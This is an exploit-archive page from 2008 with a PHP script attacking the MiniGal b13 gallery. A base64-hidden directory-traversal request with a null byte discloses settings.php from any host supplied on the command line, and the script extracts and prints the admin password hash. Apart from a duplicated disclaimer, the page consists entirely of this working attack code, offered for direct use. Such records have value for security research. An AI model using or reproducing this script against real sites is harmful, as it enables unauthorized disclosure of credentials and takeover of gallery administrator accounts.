Minigal b13 (index.php list) Remote File Disclosure Exploit
Published:2008-11-15
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
<?php
set_time_limit(0);
function find_pass($data){
$tab = explode('$gallerycopyright = ',$data);
$tab1 = explode('$version = "B13";',$tab[1]);
$tab2 = explode('$adminpass = "',$tab1[0]);
if($tab2[1]!=""){
echo("Vuln exploited enjoy !\n");
echo
sleep(1);
echo("Admin hash == [".substr($tab2[1],0,32)."]\n");
}
else{
echo("Exploit failed!!!!");
}
}
function __send($pack,$host,$port){
$ret = "";
$desc = fsockopen($host,$port,$errno, $errstr, 30);
if(!$desc){
echo("Socket say:($errno).[$errstr]");
return;
}
echo("Sending payload !!\n");
fwrite($desc,$pack);
while(!feof($desc)){
$ret.=fgets($desc);
}
fclose($desc);
find_pass($ret);
}
echo("\n=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+\n".
"+ MiniGal b13 Source Code Disclosure +\n".
"+ Alfons Luja +\n".
"+ -------------------------------------------- +\n".
"+ Usage poc.php path host port +\n".
"+ ex: poc.php /press/ wwww.doda.net.pl 80 +\n".
"+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=\n");
if($argc<3){ die("Path - host - Port - comprendo ?"); }
$path = $argv[1];
$host = $argv[2];
$port = $argv[3];
$packet = "GET ".$path.base64_decode("aW5kZXgucGhwP2xpc3Q9Li4vc2V0dGluZ3MucGhwJTAwIEhUVFAvMS4x")."\r\n";
$packet .= "Host:".$host."\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n\r\n";
echo("\nConnecting to $host\n");
__send($packet,$host,$port);
?>// Sebug.net [ 2008-11-16 ]